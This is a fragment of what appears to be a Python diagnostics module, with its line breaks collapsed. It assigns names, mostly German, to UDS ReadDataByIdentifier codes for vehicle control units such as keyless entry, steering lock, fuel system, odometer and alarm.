= "07 Fahrzeugspezifische Daten Lesen" +UDS_RDBI.dataIdentifiers[0x0315] = "External failure" +UDS_RDBI.dataIdentifiers[0x0316] = "Kontrollschalter Eigendiagnose" +UDS_RDBI.dataIdentifiers[0x0317] = "voltage kl30z st cold auto rv close" +UDS_RDBI.dataIdentifiers[0x0318] = "number of PN swith close due to current flow pass diodes" +UDS_RDBI.dataIdentifiers[0x0319] = "switch failure" +UDS_RDBI.dataIdentifiers[0x031a] = "ZGW Konfiguration D CAN" # or KL50 time out +UDS_RDBI.dataIdentifiers[0x031b] = "KL50 0 and WS 0 timeout or WS signal 2 5V 6V" +UDS_RDBI.dataIdentifiers[0x031c] = "other HW failure" +UDS_RDBI.dataIdentifiers[0x0320] = "reset all fault history memory" +UDS_RDBI.dataIdentifiers[0x0321] = "Informationen BINAER 1 Authentisch benutzt" +UDS_RDBI.dataIdentifiers[0x0322] = "EZS erweiterter Status KeylessGo" +UDS_RDBI.dataIdentifiers[0x0324] = "ZV Letzte Bedienungen" +UDS_RDBI.dataIdentifiers[0x0325] = "ZV Letzte Bedienungen Ringpuffer" +UDS_RDBI.dataIdentifiers[0x0326] = "ZV Letzte Schluessel Aktion" +UDS_RDBI.dataIdentifiers[0x0327] = "PRE Lock Ereignisspeicher" +UDS_RDBI.dataIdentifiers[0x0328] = "Status Thatcham SE Fangbereich Rechenschritte Auth" +UDS_RDBI.dataIdentifiers[0x0329] = "Letzter FC DSM Letzter Funktionscode vom DSM" +UDS_RDBI.dataIdentifiers[0x032a] = "verbaute Steuergeraete Ist Bus" +UDS_RDBI.dataIdentifiers[0x032b] = "verbaute Steuergeraete Ist Bus" +UDS_RDBI.dataIdentifiers[0x032c] = "verbaute Steuergeraete Ist Bus" +UDS_RDBI.dataIdentifiers[0x032d] = "verbaute Steuergeraete Ist Bus 4" +UDS_RDBI.dataIdentifiers[0x032e] = "verbaute Steuergeraete Ist Bus 5" +UDS_RDBI.dataIdentifiers[0x032f] = "verbaute Steuergeraete Ist Bus 6" +UDS_RDBI.dataIdentifiers[0x0330] = "Letzter FC MSG Letzter Funktionscode vom MSG" +UDS_RDBI.dataIdentifiers[0x0331] = "Letzter FC Getriebe Letzter Funktionscode vom Getriebe" +UDS_RDBI.dataIdentifiers[0x0332] = "Letzter FC Hybrid SG Letzter Funktionscode vom Hybrid SG" +UDS_RDBI.dataIdentifiers[0x0333] = "Letzter FC ELV Letzter Funktionscode von der ELV" +UDS_RDBI.dataIdentifiers[0x0334] = "Letzter FC Schluessel Letzter Funktionscode vom Schluessel" +UDS_RDBI.dataIdentifiers[0x0335] = "Status Konfigurationsbyte EZS verriegeln Status Konfigurationsbyte" +UDS_RDBI.dataIdentifiers[0x0336] = "Letzter FC DSM" +UDS_RDBI.dataIdentifiers[0x0337] = "Status Thatcham SE Fangbereich" +UDS_RDBI.dataIdentifiers[0x0338] = "Konfiguration Schluessel im EZS" +UDS_RDBI.dataIdentifiers[0x033a] = "Eigendiagnose Eintraege global" +UDS_RDBI.dataIdentifiers[0x033b] = "Eigendiagnose Eintraege identifiziert Anzahl erkannter Fehler" +UDS_RDBI.dataIdentifiers[0x033c] = "Eigendiagnose Zaehler global" +UDS_RDBI.dataIdentifiers[0x033d] = "Eigendiagnose Zaehler indiziert" +UDS_RDBI.dataIdentifiers[0x033e] = "Eigendiagnose FSP Eintrag AS AGC LOCK in FSP uebernehmen" +UDS_RDBI.dataIdentifiers[0x0340] = "Eindrahtschnittstelle Info Funkempfaenger vorhanden" +UDS_RDBI.dataIdentifiers[0x0341] = "Funkempfaenger Laendervariante Laendervariante" +UDS_RDBI.dataIdentifiers[0x0342] = "HF Empfangsdaten AUTH ZB" +UDS_RDBI.dataIdentifiers[0x0350] = "Konfiguration ELV VCD" +UDS_RDBI.dataIdentifiers[0x0351] = "ELV Verriegelungsablaufdaten" +UDS_RDBI.dataIdentifiers[0x0352] = "Signale zur Klemmengenerierung" +UDS_RDBI.dataIdentifiers[0x0360] = "Konfiguration Polling" +UDS_RDBI.dataIdentifiers[0x0361] = "Konfiguration FBS4 Write" +UDS_RDBI.dataIdentifiers[0x0380] = "SST Konfiguration" +UDS_RDBI.dataIdentifiers[0x0382] = "BTS Konfiguration VCD" +UDS_RDBI.dataIdentifiers[0x0385] = "Konfiguration IGN ON" +UDS_RDBI.dataIdentifiers[0x0386] = "Konfiguration Klemmen VAN" +UDS_RDBI.dataIdentifiers[0x0390] = "RTC Datum Uhrzeit" +UDS_RDBI.dataIdentifiers[0x0391] = "RTC Konfiguration" +UDS_RDBI.dataIdentifiers[0x0392] = "RTC Tagesumschlagzaehler" +UDS_RDBI.dataIdentifiers[0x03a0] = "Konfiguration fuer Produktion VC" +UDS_RDBI.dataIdentifiers[0x03a1] = "TAG Konfiguration" +UDS_RDBI.dataIdentifiers[0x03a2] = "TAG Position Tuergriff" +UDS_RDBI.dataIdentifiers[0x03ff] = "Lieferumfangsnummer" +UDS_RDBI.dataIdentifiers[0x0400] = "0400 Signal engine rpm last correct value" +UDS_RDBI.dataIdentifiers[0x0401] = "KG231 Konfiguration" # or Max operating voltage +UDS_RDBI.dataIdentifiers[0x0402] = "single RV mos 2ms ocp" +UDS_RDBI.dataIdentifiers[0x0403] = "KeylessGo Kodierung" +UDS_RDBI.dataIdentifiers[0x0404] = "single RV mos 10ms ocp" +UDS_RDBI.dataIdentifiers[0x0405] = "Schalterspeicher Heckklappentaster" +UDS_RDBI.dataIdentifiers[0x0406] = "single RV MOS continual min start current" +UDS_RDBI.dataIdentifiers[0x0407] = "single bypass MOS switch min start current" +UDS_RDBI.dataIdentifiers[0x0408] = "Cold start KL50 ST RV switch close delay" +UDS_RDBI.dataIdentifiers[0x0409] = "CfgVAN DTSTO Read" +UDS_RDBI.dataIdentifiers[0x040a] = "warm start KL50 ST RV switch close delay" +UDS_RDBI.dataIdentifiers[0x040b] = "warm start to pre charging KL50 ST by pass switch open delay" +UDS_RDBI.dataIdentifiers[0x040c] = "pre charging to charging WS PN switch close delay" +UDS_RDBI.dataIdentifiers[0x040d] = "charging to pre auto warm start WS PN switch open delay" +UDS_RDBI.dataIdentifiers[0x040e] = "ST bypass close delay after RV close max" +UDS_RDBI.dataIdentifiers[0x040f] = "ST bypass close delay after RV close min" +UDS_RDBI.dataIdentifiers[0x0410] = "Kommunikation ELV" +UDS_RDBI.dataIdentifiers[0x0411] = "Kommunikation MSG Letzter Funktionscode vom MSG" +UDS_RDBI.dataIdentifiers[0x0412] = "Kommunikation Getriebe Letzter Funktionscode vom Getriebe" +UDS_RDBI.dataIdentifiers[0x0413] = "Kommunikation DSM Letzter Funktionscode vom DSM" +UDS_RDBI.dataIdentifiers[0x0414] = "Kommunikation Hybrid SG Letzter Funktionscode vom Hybrid SG" +UDS_RDBI.dataIdentifiers[0x0415] = "Kommunikation Schluessel Letzter Funktionscode vom Schluessel" +UDS_RDBI.dataIdentifiers[0x0416] = "rv over heat threshold" +UDS_RDBI.dataIdentifiers[0x0417] = "starter open kl30z st threshold" +UDS_RDBI.dataIdentifiers[0x0420] = "0420 Signal vehicle speed last correct value" +UDS_RDBI.dataIdentifiers[0x0421] = "Informationen EZS Aktiviert" +UDS_RDBI.dataIdentifiers[0x0422] = "EZS erweiterter Status Authentikations Anforderungsart" +UDS_RDBI.dataIdentifiers[0x0425] = "Letzte ZV Bedienungen" +UDS_RDBI.dataIdentifiers[0x0430] = "0430 Signal ignition limit violation" +UDS_RDBI.dataIdentifiers[0x0440] = "0440 Signal drive program last correct value" +UDS_RDBI.dataIdentifiers[0x0470] = "ELV zyklische Pruefung" +UDS_RDBI.dataIdentifiers[0x0471] = "ELV Kommunikationsparameter" +UDS_RDBI.dataIdentifiers[0x0472] = "ELV Verriegelung" +UDS_RDBI.dataIdentifiers[0x0480] = "Motorweiterlaufschaltung" +UDS_RDBI.dataIdentifiers[0x0481] = "Remote Start Engine" +UDS_RDBI.dataIdentifiers[0x0490] = "ZV Nachlaufzeit Vorraste" +UDS_RDBI.dataIdentifiers[0x04a0] = "EZS Variantenkodierung Schluessel" +UDS_RDBI.dataIdentifiers[0x04a1] = "KM Stand Speicher CRC" +UDS_RDBI.dataIdentifiers[0x04d3] = "Schwellen taktile Leisten" +UDS_RDBI.dataIdentifiers[0x04f3] = "Variante" +UDS_RDBI.dataIdentifiers[0x04f4] = "Variantenstatus" +UDS_RDBI.dataIdentifiers[0x0501] = "Version Applikationsmodell NV" +UDS_RDBI.dataIdentifiers[0x0502] = "Version FuMo Interface NV" +UDS_RDBI.dataIdentifiers[0x0503] = "Eingangssignale" +UDS_RDBI.dataIdentifiers[0x0504] = "Spiegelabklappung" +UDS_RDBI.dataIdentifiers[0x0505] = "FZV Zaehler" +UDS_RDBI.dataIdentifiers[0x0506] = "ZV Status aktuell" +UDS_RDBI.dataIdentifiers[0x0507] = "SwcDidaC TransportDp3Offset" +UDS_RDBI.dataIdentifiers[0x0509] = "FBS mobil Tuergriff Daten" +UDS_RDBI.dataIdentifiers[0x050a] = "SwcDidaC TransportCOM ActiveState Read" +UDS_RDBI.dataIdentifiers[0x050d] = "Read Stored EVC Configuration" +UDS_RDBI.dataIdentifiers[0x0510] = "Verzoegerungzeit Verriegelung ELV Verzoegerungzeit Verriegelung ELV" +UDS_RDBI.dataIdentifiers[0x0511] = "Keyless Data Set KDS" +UDS_RDBI.dataIdentifiers[0x0513] = "FBS mobil Tuergriff Konfiguration" +UDS_RDBI.dataIdentifiers[0x0514] = "UWB HF Konfiguration" +UDS_RDBI.dataIdentifiers[0x0520] = "LF Parameter Exterior Scan LI Write" +UDS_RDBI.dataIdentifiers[0x0521] = "LF Parameter Exterior Scan RE Read" +UDS_RDBI.dataIdentifiers[0x0522] = "LF Parameter Exterior Scan REAR Write" +UDS_RDBI.dataIdentifiers[0x0523] = "LF Parameter INTERIOR Scan 1 Read" +UDS_RDBI.dataIdentifiers[0x0524] = "LF Parameter INTERIOR Scan 2 Write" +UDS_RDBI.dataIdentifiers[0x0525] = "LF Parameter Reserve 1" +UDS_RDBI.dataIdentifiers[0x0526] = "LF Parameter Reserve 2" +UDS_RDBI.dataIdentifiers[0x0527] = "LF Parameter Reserve 3" +UDS_RDBI.dataIdentifiers[0x0528] = "LF Parameter Reserve 1" +UDS_RDBI.dataIdentifiers[0x0529] = "LF Parameter Reserve 5" +UDS_RDBI.dataIdentifiers[0x0530] = "0530 Audio Codec Status AD not powered up" +UDS_RDBI.dataIdentifiers[0x0531] = "Feldauswertung 1 FieldEvalHistFound 2" +UDS_RDBI.dataIdentifiers[0x0532] = "Feldauswertung 1 FieldEvalHistFound 3" +UDS_RDBI.dataIdentifiers[0x0533] = "DidAc DP1 Part4 1" +UDS_RDBI.dataIdentifiers[0x0534] = "Feldauswertung 1 FieldEvalHistFound 5" +UDS_RDBI.dataIdentifiers[0x0535] = "Feldauswertung 1 FieldEvalHistFound 6" +UDS_RDBI.dataIdentifiers[0x0536] = "Feldauswertung 1 FieldEvalHistFound 7" +UDS_RDBI.dataIdentifiers[0x0537] = "Feldauswertung 1 FieldEvalHistFound 8" +UDS_RDBI.dataIdentifiers[0x0538] = "Feldauswertung 1 FieldEvalHistFound 9" +UDS_RDBI.dataIdentifiers[0x0539] = "Feldauswertung 1 FieldEvalHistFound 10" +UDS_RDBI.dataIdentifiers[0x0540] = "Feldauswertung 2" +UDS_RDBI.dataIdentifiers[0x0541] = "Feldauswertung 2 2" +UDS_RDBI.dataIdentifiers[0x0542] = "Feldauswertung 2 3" +UDS_RDBI.dataIdentifiers[0x0543] = "Feldauswertung 2 4" +UDS_RDBI.dataIdentifiers[0x0544] = "Feldauswertung 2 5" +UDS_RDBI.dataIdentifiers[0x0545] = "Feldauswertung 2 6" +UDS_RDBI.dataIdentifiers[0x0546] = "Feldauswertung 2 7" +UDS_RDBI.dataIdentifiers[0x0547] = "Feldauswertung 2 8" +UDS_RDBI.dataIdentifiers[0x0548] = "Feldauswertung 2 9" +UDS_RDBI.dataIdentifiers[0x0549] = "Feldauswertung 2 10" +UDS_RDBI.dataIdentifiers[0x0550] = "Antennenmodul Daten" +UDS_RDBI.dataIdentifiers[0x0551] = "Softwarestand" +UDS_RDBI.dataIdentifiers[0x0560] = "Wiederholungen ueber Funk" +UDS_RDBI.dataIdentifiers[0x0561] = "Klassifizierung fuer KG Wiederholungen" +UDS_RDBI.dataIdentifiers[0x0562] = "Erstellung von Tuergriffprofilen" +UDS_RDBI.dataIdentifiers[0x0563] = "Anzahl Initialisierungen Funkempfaengers" +UDS_RDBI.dataIdentifiers[0x0564] = "Spielschutz" +UDS_RDBI.dataIdentifiers[0x0565] = "HFA Ausloesungen ohne ID Geber" +UDS_RDBI.dataIdentifiers[0x0566] = "Kombimeldung Schluesselbatterie wechseln" +UDS_RDBI.dataIdentifiers[0x0567] = "Resetcounter" # or Program Flow Monitoring +UDS_RDBI.dataIdentifiers[0x0568] = "Daten des ID Gebers" +UDS_RDBI.dataIdentifiers[0x0569] = "SCN CfgByteList 01" +UDS_RDBI.dataIdentifiers[0x056f] = "SCN Parameter 2" +UDS_RDBI.dataIdentifiers[0x0570] = "LIN Modus Umschaltung" +UDS_RDBI.dataIdentifiers[0x0571] = "SCN Parameter 3" +UDS_RDBI.dataIdentifiers[0x0572] = "SCN Parameter 4" +UDS_RDBI.dataIdentifiers[0x0580] = "Datenblock EDS2 Bluetooth" +UDS_RDBI.dataIdentifiers[0x05f0] = "EOL VU2 WAKE STATI" +UDS_RDBI.dataIdentifiers[0x05f1] = "EOL VU2 Ausgabe ADC Werte" +UDS_RDBI.dataIdentifiers[0x0600] = "EZS Variantenkodierung Schluessel Dida" +UDS_RDBI.dataIdentifiers[0x0601] = "Ringpuffer Kommunikation KeylessGo" +UDS_RDBI.dataIdentifiers[0x0602] = "Ringpuffer Kommunikation ELV" +UDS_RDBI.dataIdentifiers[0x0603] = "Ringpuffer Kommunikation WMI" +UDS_RDBI.dataIdentifiers[0x0605] = "ECU Konfiguration II ELV" +UDS_RDBI.dataIdentifiers[0x0609] = "SwcDidaC TesterPresentHistory" +UDS_RDBI.dataIdentifiers[0x0650] = "BWM V2 Konfiguration VCD" +UDS_RDBI.dataIdentifiers[0x0651] = "BWM V2 Ereignisse Teil 1 Read Ereignisspeicher Teil" +UDS_RDBI.dataIdentifiers[0x0652] = "BWM V2 Ereignisse Teil 2 Read Ereignisspeicher Teil" +UDS_RDBI.dataIdentifiers[0x0653] = "BWM V2 Ereignisse Teil 3 Read Ereignisspeicher Teil" +UDS_RDBI.dataIdentifiers[0x0654] = "BWM V2 Ereignisse Teil 4 Read Ereignisspeicher Teil 4" +UDS_RDBI.dataIdentifiers[0x0655] = "BWM V2 Ueberwachungsphase" +UDS_RDBI.dataIdentifiers[0x0656] = "BWM V2 Fehlerdatenspeicher" +UDS_RDBI.dataIdentifiers[0x0657] = "BWM V2 Zaehler" +UDS_RDBI.dataIdentifiers[0x0700] = "RSE Konfiguration" +UDS_RDBI.dataIdentifiers[0x0701] = "Voltage Information Read" +UDS_RDBI.dataIdentifiers[0x0702] = "EKP Lauf" +UDS_RDBI.dataIdentifiers[0x0703] = "Sensor Information Read" +UDS_RDBI.dataIdentifiers[0x0704] = "SBC" +UDS_RDBI.dataIdentifiers[0x0706] = "Temperature Counter" +UDS_RDBI.dataIdentifiers[0x0707] = "Batteriespannung Read Response Parameters Batteriespannung" +UDS_RDBI.dataIdentifiers[0x0708] = "Zuendschluesselposition Read Response Parameters Zuendschluesselposition" +UDS_RDBI.dataIdentifiers[0x0709] = "Klemme 15 HW Read Response Parameters Klemme 15" +UDS_RDBI.dataIdentifiers[0x0710] = "FuelLowPress Sys Rq" +UDS_RDBI.dataIdentifiers[0x0711] = "EKP RUN Status Read Response Parameters EKP RUN" +UDS_RDBI.dataIdentifiers[0x0712] = "OFC Stat PT" +UDS_RDBI.dataIdentifiers[0x0713] = "Hebelgeber Widerstand primaer sekundaer" +UDS_RDBI.dataIdentifiers[0x0714] = "Kraftstofffuellstand Reserve" +UDS_RDBI.dataIdentifiers[0x0715] = "Kraftstoffmenge ungedaempft gesamt primaer sekundaer" +UDS_RDBI.dataIdentifiers[0x0716] = "Kraftstoffmenge gedaempft gesamt primaer sekundaer" +UDS_RDBI.dataIdentifiers[0x0717] = "Krafstoffmenge komplett gedaempft Read Krafstoffmenge komplett gedaempft" +UDS_RDBI.dataIdentifiers[0x0718] = "FuelLevel Stuck Status Read Response Parameters FuelLevel Stuck Status Secondary" +UDS_RDBI.dataIdentifiers[0x0719] = "Kraftstoffdruck Read Kraftstoffdruck" +UDS_RDBI.dataIdentifiers[0x0720] = "Kraftstoffdruck berechnet" +UDS_RDBI.dataIdentifiers[0x0721] = "Kraftstoffdruckvorgabe" +UDS_RDBI.dataIdentifiers[0x0722] = "Volumenstrom Vorgabe" +UDS_RDBI.dataIdentifiers[0x0723] = "Volumenstrom Kraftstoffpumpe berechnet" +UDS_RDBI.dataIdentifiers[0x0724] = "Volumenstrom Saugstrahlpumpe berechnet" +UDS_RDBI.dataIdentifiers[0x0725] = "Kraftstoffpumpendrehzahl Read Response Parameters Kraftstoffpumpendrehzahl" +UDS_RDBI.dataIdentifiers[0x0726] = "Kraftstoffpumpenspannung Read Response Parameters Kraftstoffpumpenspannung" +UDS_RDBI.dataIdentifiers[0x0727] = "Kraftstoffpumpenstrom effektiv" +UDS_RDBI.dataIdentifiers[0x0728] = "Kraftstoffpumpenstrom PhaseMax" +UDS_RDBI.dataIdentifiers[0x0729] = "Kraftstoffpumpendutycycle Read Response Parameters Kraftstoffpumpendutycycle" +UDS_RDBI.dataIdentifiers[0x0730] = "Kraftstoffethanolgehalt" +UDS_RDBI.dataIdentifiers[0x0731] = "Kraftstofftemperatur vom Drucksensor digital Read Kraftstofftemperatur vom Drucksensor digital" +UDS_RDBI.dataIdentifiers[0x0732] = "Steuergeraetetemperatur" +UDS_RDBI.dataIdentifiers[0x0733] = "SSP Failure Counter" +UDS_RDBI.dataIdentifiers[0x0734] = "Volume Lifetime Read Response Parameters Fuel Volume Lifetime" +UDS_RDBI.dataIdentifiers[0x0735] = "StDiagVolumeLastStuckConfirmedPrimary" +UDS_RDBI.dataIdentifiers[0x0736] = "StDiagVolumeLastStuckConfirmedSecondary" +UDS_RDBI.dataIdentifiers[0x0737] = "Tank Level Max and Active characteristic Read Response Parameters Tank Level Max" +UDS_RDBI.dataIdentifiers[0x0738] = "CAN FuelPress In" +UDS_RDBI.dataIdentifiers[0x0739] = "FD PredFuelPressAdaptedSignal" +UDS_RDBI.dataIdentifiers[0x0750] = "SPA Parameter" +UDS_RDBI.dataIdentifiers[0x0770] = "MCC Konfiguration" +UDS_RDBI.dataIdentifiers[0x0780] = "SCAS Konfiguration" +UDS_RDBI.dataIdentifiers[0x0781] = "Wake up puls configuration" +UDS_RDBI.dataIdentifiers[0x0782] = "Autonegotiation configuration" +UDS_RDBI.dataIdentifiers[0x0800] = "Actual E Stand" # or Secure Odometer Zustaende, Release Version TCU Core PRES E Stand ASCII type 20Byte, Release Version TCU Core +UDS_RDBI.dataIdentifiers[0x0801] = "Secure Odometer" +UDS_RDBI.dataIdentifiers[0x0802] = "Secure Odometer Kilometerstand" +UDS_RDBI.dataIdentifiers[0x0900] = "VTA HW Eingaenge" +UDS_RDBI.dataIdentifiers[0x0901] = "VTA Schalterzustand" +UDS_RDBI.dataIdentifiers[0x0902] = "VTA Schalterspeicher" +UDS_RDBI.dataIdentifiers[0x0903] = "VTA Schaltermodell" +UDS_RDBI.dataIdentifiers[0x0904] = "VTA Type Parameter" +UDS_RDBI.dataIdentifiers[0x0905] = "VTA Alarmhistorie" +UDS_RDBI.dataIdentifiers[0x0906] = "VTA Ueberwachungszustand" +UDS_RDBI.dataIdentifiers[0x0907] = "VTA Zaehlerstand Alarmrecycling" +UDS_RDBI.dataIdentifiers[0x0908] = "VTA Alarmtzustand" +UDS_RDBI.dataIdentifiers[0x0909] = "VTA Zustandsgroessen" +UDS_RDBI.dataIdentifiers[0x090a] = "VTA Country Parameter" +UDS_RDBI.dataIdentifiers[0x090b] = "VTA Schalterfreigabe" +UDS_RDBI.dataIdentifiers[0x090c] = "VTA Vehicle Type" +UDS_RDBI.dataIdentifiers[0x0a20] = "High Resolution DisCharge" +UDS_RDBI.dataIdentifiers[0x0a21] = "High Resolution Charge" +UDS_RDBI.dataIdentifiers[0x0e63] = "Fensterhochlaufbewertung" +UDS_RDBI.dataIdentifiers[0x0e70] = "Fensterreversierer Trace" +UDS_RDBI.dataIdentifiers[0x0e71] = "Fensterreversierer Trace" +UDS_RDBI.dataIdentifiers[0x0e72] = "Fensterreversierer Trace" +UDS_RDBI.dataIdentifiers[0x0e73] = "Fensterreversierer Trace 4" +UDS_RDBI.dataIdentifiers[0x0e74] = "Fensterreversierer Trace 5" +UDS_RDBI.dataIdentifiers[0x0e75] = "Fensterreversierer Trace 6" +UDS_RDBI.dataIdentifiers[0x0e76] = "Fensterreversierer Trace 7" +UDS_RDBI.dataIdentifiers[0x0e77] = "Fensterreversierer Trace 8" +UDS_RDBI.dataIdentifiers[0x1002] = "Batteriesensor" # or Erase all Production data, Learned drive positions +UDS_RDBI.dataIdentifiers[0x1003] = "Spannungs und Stromwerte" # or Geschwindigkeitsprofil Oeffnen +UDS_RDBI.dataIdentifiers[0x1004] = "CVN Berechnung" # or CVN Berechnung fertig, Stopp Start, PRND Movement Counter / P in emergency counter +UDS_RDBI.dataIdentifiers[0x1005] = "Restladestrombewertung" # or FIN Neuschreiben ist verriegelt, Regelparameter Oeffnen P-Anteil, Betriebszeit +UDS_RDBI.dataIdentifiers[0x1006] = "Module limits and position factors" # or Vernetzungsvariante, VIN Schreiben verriegelt +UDS_RDBI.dataIdentifiers[0x1007] = "Regelparameter Oeffnen I-Anteil" # or Kommunikationsvariante, 12V Systemabbild +UDS_RDBI.dataIdentifiers[0x1008] = "12V Li Systemabbild" # or Regelparameter Schliessen P-Anteil +UDS_RDBI.dataIdentifiers[0x1009] = "Regelparameter Schliessen I-Anteil" +UDS_RDBI.dataIdentifiers[0x100a] = "Darkzones" # or Model Version +UDS_RDBI.dataIdentifiers[0x100b] = "Blockiertoleranzen" +UDS_RDBI.dataIdentifiers[0x100c] = "Normierparameter VC" +UDS_RDBI.dataIdentifiers[0x100d] = "Allgemeine Funktionsparameter VC" +UDS_RDBI.dataIdentifiers[0x100e] = "Seriennummer MFT Test" +UDS_RDBI.dataIdentifiers[0x100f] = "Kontrollschalter 1 VC" +UDS_RDBI.dataIdentifiers[0x1010] = "Regelparameter Ausgangsumrechnung" +UDS_RDBI.dataIdentifiers[0x1011] = "Allgemeine Zustandsinformationen" +UDS_RDBI.dataIdentifiers[0x1012] = "AMS Sensor Diagnose Data" +UDS_RDBI.dataIdentifiers[0x1013] = "Kontrollschalter 4 VC" +UDS_RDBI.dataIdentifiers[0x1014] = "Stillstandserkennung" +UDS_RDBI.dataIdentifiers[0x1020] = "CALID OBCH" +UDS_RDBI.dataIdentifiers[0x1021] = "CALID HVAC" +UDS_RDBI.dataIdentifiers[0x1022] = "CALID DCDC48" +UDS_RDBI.dataIdentifiers[0x1023] = "CALID LISB48" +UDS_RDBI.dataIdentifiers[0x1024] = "CALID DCB READ" +UDS_RDBI.dataIdentifiers[0x102d] = "Warntongeber" +UDS_RDBI.dataIdentifiers[0x102e] = "Kontrollschalter" +UDS_RDBI.dataIdentifiers[0x102f] = "Kontrollschalter" +UDS_RDBI.dataIdentifiers[0x1030] = "CVN OBCH" +UDS_RDBI.dataIdentifiers[0x1031] = "CVN HVAC" +UDS_RDBI.dataIdentifiers[0x1032] = "CVN DCDC48" +UDS_RDBI.dataIdentifiers[0x1033] = "CVN LISB48" +UDS_RDBI.dataIdentifiers[0x1034] = "CVN DCB READ" +UDS_RDBI.dataIdentifiers[0x1050] = "PNDS Counter" +UDS_RDBI.dataIdentifiers[0x1051] = "IOD CurrRead" +UDS_RDBI.dataIdentifiers[0x1052] = "BatChangeRead" +UDS_RDBI.dataIdentifiers[0x1053] = "BSBFltRead" +UDS_RDBI.dataIdentifiers[0x1054] = "ChargeBalance" +UDS_RDBI.dataIdentifiers[0x1055] = "DDP" +UDS_RDBI.dataIdentifiers[0x1056] = "Prod TraMode State" +UDS_RDBI.dataIdentifiers[0x1058] = "CurrentTrace" +UDS_RDBI.dataIdentifiers[0x1059] = "CycleLog" +UDS_RDBI.dataIdentifiers[0x105a] = "CycleLog Additional" +UDS_RDBI.dataIdentifiers[0x105b] = "PNDS WarmData" +UDS_RDBI.dataIdentifiers[0x105c] = "PNDS ColdData" +UDS_RDBI.dataIdentifiers[0x1080] = "OMC Parameters" +UDS_RDBI.dataIdentifiers[0x1081] = "BCM Parameters" +UDS_RDBI.dataIdentifiers[0x1082] = "BCD Parameters" +UDS_RDBI.dataIdentifiers[0x1083] = "BSI Parameters" +UDS_RDBI.dataIdentifiers[0x1084] = "BSB Parameters" +UDS_RDBI.dataIdentifiers[0x1085] = "ICC Parameters" +UDS_RDBI.dataIdentifiers[0x1086] = "SSM Parameters" +UDS_RDBI.dataIdentifiers[0x1087] = "DDP Parameters" +UDS_RDBI.dataIdentifiers[0x1088] = "FOTA Parameters" +UDS_RDBI.dataIdentifiers[0x1089] = "DLM Parameters" +UDS_RDBI.dataIdentifiers[0x108a] = "Prod and Service Parameters" +UDS_RDBI.dataIdentifiers[0x108b] = "PNDS Parameters" +UDS_RDBI.dataIdentifiers[0x108c] = "ISP Parameters" +UDS_RDBI.dataIdentifiers[0x108d] = "OSP Parameters" +UDS_RDBI.dataIdentifiers[0x108e] = "HW Parameters" +UDS_RDBI.dataIdentifiers[0x1100] = "Progammstandskennung Build" +UDS_RDBI.dataIdentifiers[0x1101] = "uBN TrackingRegister BE Block" +UDS_RDBI.dataIdentifiers[0x1102] = "uBN TrackingRegister BE Block" +UDS_RDBI.dataIdentifiers[0x1103] = "uBN TrackingRegister BE Block 4" +UDS_RDBI.dataIdentifiers[0x1104] = "uBN TrackingRegister BE Block 5" +UDS_RDBI.dataIdentifiers[0x1110] = "uBN TrackingRegister MonPhase" +UDS_RDBI.dataIdentifiers[0x1120] = "uBN Error Data Register" +UDS_RDBI.dataIdentifiers[0x1122] = "HV Bus Open Fault Enabler" +UDS_RDBI.dataIdentifiers[0x1123] = "Manufacturing Boost Mode Enable Command DCX" +UDS_RDBI.dataIdentifiers[0x1124] = "Boost Mode Enable Failure History DCX" # or Hybrid Battery Pump Control Enable" +UDS_RDBI.dataIdentifiers[0x1125] = "Operation Mode DCX" +UDS_RDBI.dataIdentifiers[0x1130] = "uBN Konfiguration VCD" +UDS_RDBI.dataIdentifiers[0x1131] = "uBN Zaehler" +UDS_RDBI.dataIdentifiers[0x1141] = "Run/Crank Voltage" +UDS_RDBI.dataIdentifiers[0x11a1] = "Engine Run Time" +UDS_RDBI.dataIdentifiers[0x1200] = "Oeldatensatz Grunddaten" +UDS_RDBI.dataIdentifiers[0x1201] = "Oeldatensatz Grunddaten 2" +UDS_RDBI.dataIdentifiers[0x1202] = "Oeldatensatz Warnung" +UDS_RDBI.dataIdentifiers[0x1203] = "Oeldatensatz Warnung 2" +UDS_RDBI.dataIdentifiers[0x1204] = "Oeldatensatz Oelstandsabfrage" +UDS_RDBI.dataIdentifiers[0x1205] = "Oeldatensatz Nachfuellerkennung" +UDS_RDBI.dataIdentifiers[0x1206] = "Oeldatensatz variabel" +UDS_RDBI.dataIdentifiers[0x1232] = "Emissions Warm-Up Counter" +UDS_RDBI.dataIdentifiers[0x1233] = "Non Emissions Warm-Up Counter" +UDS_RDBI.dataIdentifiers[0x1234] = "Mileage Distance Since Code Clear 2Byte" +UDS_RDBI.dataIdentifiers[0x12de] = "Main Processor Reset Source" +UDS_RDBI.dataIdentifiers[0x12e7] = "Main Processor Running Reset Source Address" +UDS_RDBI.dataIdentifiers[0x1940] = "Transmission Oil Temperature" +UDS_RDBI.dataIdentifiers[0x1942] = "Transmission Output Speed" +UDS_RDBI.dataIdentifiers[0x194f] = "Transmission PRND Range" +UDS_RDBI.dataIdentifiers[0x1951] = "Transmission Range Input" +UDS_RDBI.dataIdentifiers[0x195d] = "Transfer Case Ratio" +UDS_RDBI.dataIdentifiers[0x197e] = "Transmission Tap Up/Down" +UDS_RDBI.dataIdentifiers[0x19a1] = "Transmission Gear Ratio" +UDS_RDBI.dataIdentifiers[0x1a22] = "Cumulative Charge AmpHours" +UDS_RDBI.dataIdentifiers[0x1a23] = "Cumulative DisCharge AmpHours" +UDS_RDBI.dataIdentifiers[0x1a2d] = "Engine Actual Steady State Torque" +UDS_RDBI.dataIdentifiers[0x1a31] = "LifeTime Number Of Opens" +UDS_RDBI.dataIdentifiers[0x1a32] = "LifeTime Number Of Closes" +UDS_RDBI.dataIdentifiers[0x1a33] = "LifeTime Number Of Opens Under Load" +UDS_RDBI.dataIdentifiers[0x1a34] = "LifeTime Number Of Impending Opens" +UDS_RDBI.dataIdentifiers[0x1a35] = "LifeTime Number Of Open Requests" +UDS_RDBI.dataIdentifiers[0x1a36] = "LifeTime Number of loss 12V" +UDS_RDBI.dataIdentifiers[0x1a37] = "LifeTime Number of PreCharge" +UDS_RDBI.dataIdentifiers[0x1a9c] = "Engineering Software number" +UDS_RDBI.dataIdentifiers[0x1a9d] = "Vehicle Kilometers" +UDS_RDBI.dataIdentifiers[0x1a9f] = "Shipped Packs" +UDS_RDBI.dataIdentifiers[0x1b01] = "HV SOC History" +UDS_RDBI.dataIdentifiers[0x1b02] = "HV SOC History" +UDS_RDBI.dataIdentifiers[0x1b03] = "HV SOC History" +UDS_RDBI.dataIdentifiers[0x1b04] = "HV SOC History 4" +UDS_RDBI.dataIdentifiers[0x1b05] = "HV SOC History 5" 